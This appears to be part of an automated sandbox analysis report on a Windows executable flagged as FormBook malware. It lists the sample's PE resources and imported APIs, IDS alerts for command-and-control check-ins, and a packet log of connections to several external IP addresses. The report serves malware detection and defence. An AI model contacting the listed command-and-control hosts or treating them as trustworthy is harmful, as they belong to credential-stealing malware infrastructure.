                                                                                                                                                                .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                                                RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                                                RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                                                RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                                                                RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                                                                RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                                                                RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                                                                RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                                                                RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                                                                RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                                                                RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                                                                RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                                                USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                                                GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                                                OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishGreat Britain
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-10-09T13:02:39.509624+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304982085.159.66.9380TCP
                                                                                                                                                                2024-10-09T13:02:52.764900+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304982413.248.169.4880TCP
                                                                                                                                                                2024-10-09T13:03:09.672799+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049829103.255.237.23380TCP
                                                                                                                                                                2024-10-09T13:03:22.910634+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049833104.21.77.6980TCP
                                                                                                                                                                2024-10-09T13:03:37.015594+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304983765.21.196.9080TCP
                                                                                                                                                                2024-10-09T13:03:51.267544+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.30498413.33.130.19080TCP
                                                                                                                                                                2024-10-09T13:04:04.522902+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.30498453.33.130.19080TCP
                                                                                                                                                                2024-10-09T13:04:17.750385+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049849199.59.243.22780TCP
                                                                                                                                                                2024-10-09T13:04:31.285707+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304985345.56.219.23880TCP
                                                                                                                                                                2024-10-09T13:04:44.910690+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.3049857162.0.238.4380TCP
                                                                                                                                                                2024-10-09T13:04:58.271235+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304986123.227.38.7480TCP
                                                                                                                                                                2024-10-09T13:05:11.747519+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304986584.32.84.3280TCP
                                                                                                                                                                2024-10-09T13:05:25.377801+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304986954.67.42.14580TCP
                                                                                                                                                                2024-10-09T13:05:45.583958+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.30498733.33.130.19080TCP
                                                                                                                                                                2024-10-09T13:05:59.785367+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304987781.2.196.1980TCP
                                                                                                                                                                2024-10-09T13:06:13.274403+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304988184.32.84.3280TCP
                                                                                                                                                                2024-10-09T13:07:21.807766+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.304988285.159.66.9380TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 9, 2024 13:01:39.080358982 CEST4982080192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:01:39.291022062 CEST804982085.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:01:39.291172981 CEST4982080192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:01:39.297161102 CEST4982080192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:01:39.548588991 CEST804982085.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:39.509224892 CEST804982085.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:39.509624004 CEST4982080192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:02:39.513328075 CEST4982080192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:02:39.724024057 CEST804982085.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:44.625262022 CEST4982180192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:44.726670980 CEST804982113.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:44.726963997 CEST4982180192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:44.738545895 CEST4982180192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:44.839080095 CEST804982113.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:44.839575052 CEST804982113.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:44.839847088 CEST4982180192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:46.251211882 CEST4982180192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:46.351672888 CEST804982113.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:47.269274950 CEST4982280192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:47.372133017 CEST804982213.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:47.372394085 CEST4982280192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:47.381544113 CEST4982280192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:47.483520985 CEST804982213.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:47.483632088 CEST804982213.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:47.483844995 CEST4982280192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:48.891258001 CEST4982280192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:48.992986917 CEST804982213.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:49.909465075 CEST4982380192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:50.015291929 CEST804982313.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:50.015455961 CEST4982380192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:50.025144100 CEST4982380192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:50.025192976 CEST4982380192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:50.127244949 CEST804982313.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:50.127499104 CEST804982313.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:50.127511978 CEST804982313.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:50.127624989 CEST804982313.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:52.549700022 CEST4982480192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:52.652781963 CEST804982413.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:52.653806925 CEST4982480192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:52.661657095 CEST4982480192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:52.763072014 CEST804982413.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:52.764462948 CEST804982413.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:52.764477968 CEST804982413.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:52.764899969 CEST4982480192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:52.767976046 CEST4982480192.168.11.3013.248.169.48
                                                                                                                                                                Oct 9, 2024 13:02:52.870081902 CEST804982413.248.169.48192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:00.230613947 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:00.595402956 CEST8049826103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:00.595700026 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:00.605992079 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:01.341492891 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:01.703147888 CEST8049826103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:01.703280926 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:01.704184055 CEST8049826103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:02.106976032 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:02.470777035 CEST8049826103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:03.126908064 CEST4982780192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:03.495433092 CEST8049827103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:03.495568991 CEST4982780192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:03.505832911 CEST4982780192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:03.871237040 CEST8049827103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:03.872775078 CEST8049827103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:03.872853041 CEST8049827103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:03.873039961 CEST4982780192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:04.302586079 CEST8049826103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:04.302907944 CEST4982680192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:05.012619019 CEST4982780192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:06.031017065 CEST4982880192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:06.398329973 CEST8049828103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:06.398556948 CEST4982880192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:06.408952951 CEST4982880192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:06.773515940 CEST8049828103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:06.773528099 CEST8049828103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:06.773592949 CEST8049828103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:06.776392937 CEST8049828103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:06.776427984 CEST8049828103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:06.776616096 CEST4982880192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:07.918386936 CEST4982880192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:08.936338902 CEST4982980192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:09.300960064 CEST8049829103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:09.301181078 CEST4982980192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:09.307612896 CEST4982980192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:09.671385050 CEST8049829103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:09.672271967 CEST8049829103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:09.672297001 CEST8049829103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:09.672799110 CEST4982980192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:09.675934076 CEST4982980192.168.11.30103.255.237.233
                                                                                                                                                                Oct 9, 2024 13:03:10.039824009 CEST8049829103.255.237.233192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:14.805134058 CEST4983080192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:14.899215937 CEST8049830104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:14.899482012 CEST4983080192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:14.910942078 CEST4983080192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:15.004968882 CEST8049830104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:15.016858101 CEST8049830104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:15.017555952 CEST8049830104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:15.017756939 CEST4983080192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:16.416199923 CEST4983080192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:17.435028076 CEST4983180192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:17.529632092 CEST8049831104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:17.529828072 CEST4983180192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:17.540601015 CEST4983180192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:17.635143995 CEST8049831104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:17.652224064 CEST8049831104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:17.652529955 CEST8049831104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:17.652705908 CEST4983180192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:19.056250095 CEST4983180192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.074453115 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.169477940 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.169755936 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.179485083 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.179537058 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:20.274427891 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.274503946 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.274529934 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.286434889 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.286745071 CEST8049832104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:20.286917925 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:21.680632114 CEST4983280192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.698697090 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.793751001 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.793982983 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.800280094 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.895232916 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.910089970 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.910409927 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:22.910634041 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:22.913595915 CEST4983380192.168.11.30104.21.77.69
                                                                                                                                                                Oct 9, 2024 13:03:23.008595943 CEST8049833104.21.77.69192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.371642113 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:28.564269066 CEST804983465.21.196.90192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:28.564433098 CEST4983480192.168.11.3065.21.196.90
                                                                                                                                                                Oct 9, 2024 13:03:28.574872971 CEST4983480192.168.11.3065.21.196.90
